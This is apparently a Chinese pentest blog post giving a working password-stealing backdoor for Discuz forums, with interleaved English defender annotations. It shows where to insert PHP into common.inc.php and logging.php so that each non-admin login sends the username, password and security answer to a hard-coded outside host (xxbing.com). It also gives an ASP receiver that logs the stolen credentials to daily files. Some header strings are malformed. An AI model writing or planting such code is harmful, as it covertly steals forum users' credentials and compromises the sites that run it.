http://www.80pentest.com/?p=835
DZ记录密码,我自己做了份代码。
include/common.inc.php 里面插一个自定义函数。
我选择放在 41-53行。dz7.1-72 include/login.func.php (49-51行) | dz7.0 是在根目录的logging.php
01 |
// Purpose: send $post_string to $remote_server as the body of an HTTP POST
// (prefixed with 'mypost=') and hand back the remote response.
//   $remote_server - URL passed as the first argument to file_get_contents()
//   $post_string   - text placed after 'mypost=' in the request content
//   returns        - whatever file_get_contents() returns for that request
//
// Defender note: the page describes this as a custom function inserted into
// include/common.inc.php, so it is not part of the vendor's file. Comparing
// that file against a clean copy of the same release surfaces it. A helper
// that makes an outbound HTTP POST from shared include code is worth
// reviewing wherever it appears, and web servers that have no business
// initiating outbound HTTP should be blocked from doing so at the egress.
// NOTE(review): the header text below may have been altered by the page's
// rendering; treat these strings as approximate when building content
// signatures and confirm against a real sample.
function request_by_other( $remote_server , $post_string ){ |
02 |
$context = array ( |
03 |
'http' => array ( |
04 |
'method' => 'POST' , |
05 |
'header' => 'Content-type: application/x-www-form-urlencoded' . "/r/n" . |
06 |
'User-Agent : xxbing/'s fuckyou!!!' . "/r/n" . |
07 |
'Content-length: ' . strlen ( $post_string )+8, |
08 |
'content' => 'mypost=' . $post_string ) |
09 |
); |
10 |
// Wrap the options above in a stream context so that file_get_contents()
// issues the POST instead of a plain GET.
$stream_context = stream_context_create( $context ); |
11 |
$data = file_get_contents ( $remote_server ,FALSE, $stream_context ); |
12 |
return $data ; |
13 |
} |
找到根目录下的 logging.php文件。搜索下面代码。
1 |
// Login call the page uses as its search anchor: $username and $password are
// passed to uc_user_login(), and the third argument is true only when
// $loginfield equals 'uid'. What uc_user_login() does is not shown here.
// Defender note: code placed next to this call can read the credential
// variables (presumably still in the form the user submitted - verify against
// the vendor file), so this region of logging.php / login.func.php is a
// priority when diffing an installation against a clean release.
$ucresult = uc_user_login( $username , $password , $loginfield == 'uid' ); |
然后在后面插上下面的代码:
1 |
// Purpose: for every login attempt whose $username is not 'admin', assemble
// the login fields into one string and pass it to request_by_other() together
// with a hard-coded remote URL.
//
// Defender note: the fields sent are the user name, password, security
// question id and answer, a timestamp and the site's SERVER_NAME, and the
// destination is an http:// URL, so the data also crosses the network
// unencrypted. If this snippet is found on a server, every account that
// logged in while it was present should be treated as exposed: reset the
// passwords and security answers and invalidate sessions. Because the body is
// built as 'mypost=' followed by this string, the outbound request content
// begins with the literal text mypost=name1= , which is usable in proxy or
// IDS content matching together with the destination host shown below.
if ( $username != 'admin' ){ |
2 |
// time()+8*3600 fed to gmdate() yields a UTC+8 wall-clock timestamp.
$showtime = gmdate ( "Ynj H:i:s" ,time()+8*3600); |
3 |
if ( $answer == '' ){ |
4 |
$answer = '无!' ; |
5 |
} |
6 |
// name1 is unused, but it must be included |
7 |
// NOTE(review): $name2 is not assigned anywhere in the visible snippet.
$post_string = 'name1=' . $name2 . '&name=' . $username . '&password=' . $password . '&questionid=' . $questionid . '&answer=' . $answer . '&showtime=' . $showtime . '&from=' . $_SERVER [ 'SERVER_NAME' ]; |
8 |
request_by_other( 'http://www.xxbing.com/fasong.asp' , $post_string ); |
9 |
} |
因为我熟悉asp,所以接收端我用asp写的。
asp代码如下:
01 |
<% |
' Purpose: read the posted form fields, join them into one labelled line and
' append that line to a text file named after the current date, located via
' server.mappath() relative to this script.
'
' Defender / IR note: the output is one <date>.txt file per day stored next to
' the script, each record followed by a line of dashes. On a seized or
' taken-down collection host these files list the affected accounts and the
' originating site (the "from" field), which is what victim notification
' needs. The write is not authenticated and the emptiness check below cannot
' fail, so the files may also contain records that did not come from a real
' login.
02 |
' Receiving script |
03 |
'body0 = request.form( "name1" ) |
04 |
body1 = request.form( "name" ) |
05 |
body2 = request.form( "password" ) |
06 |
body3 = request.form( "questionid" ) |
07 |
body4 = request.form( "answer" ) |
08 |
body5 = request.form( "showtime" ) |
09 |
body7 = request.form( "from" ) |
10 |
body6 = "账号:" &body1 & "---密码:" & body2 & "---问题ID:" & body3 & "---答案:" & body4 & "---时间:" & body5 & "---来源:" & body7 |
11 |
'response.write body6 |
12 |
FileName = date ()& ".txt" |
13 |
' The replacement here is for compatibility with IIS7 environments. |
14 |
FileName = Replace(FileName, "/" , "-" ) |
15 |
' body6 always contains the literal labels, so this condition is always true.
if body6 <> "" then |
16 |
Call CreateFile(body6,FileName) |
17 |
end if |
18 |
' CreateFile: append body plus a separator line to FileName.
' OpenTextFile arguments: 8 = open for appending, True = create the file if it
' does not exist, 0 = ASCII format.
Sub CreateFile(body,FileName) |
19 |
Dim fso, tf ,cf |
20 |
Set fso = CreateObject( "Scripting.FileSystemObject" ) |
21 |
Set tf = fso.openTextFile(server.mappath(FileName),8,True,0) |
22 |
tf.WriteLine body |
23 |
tf.WriteLine "----------------" |
24 |
tf.Close |
25 |
set fso = nothing |
26 |
End Sub |
27 |
%> |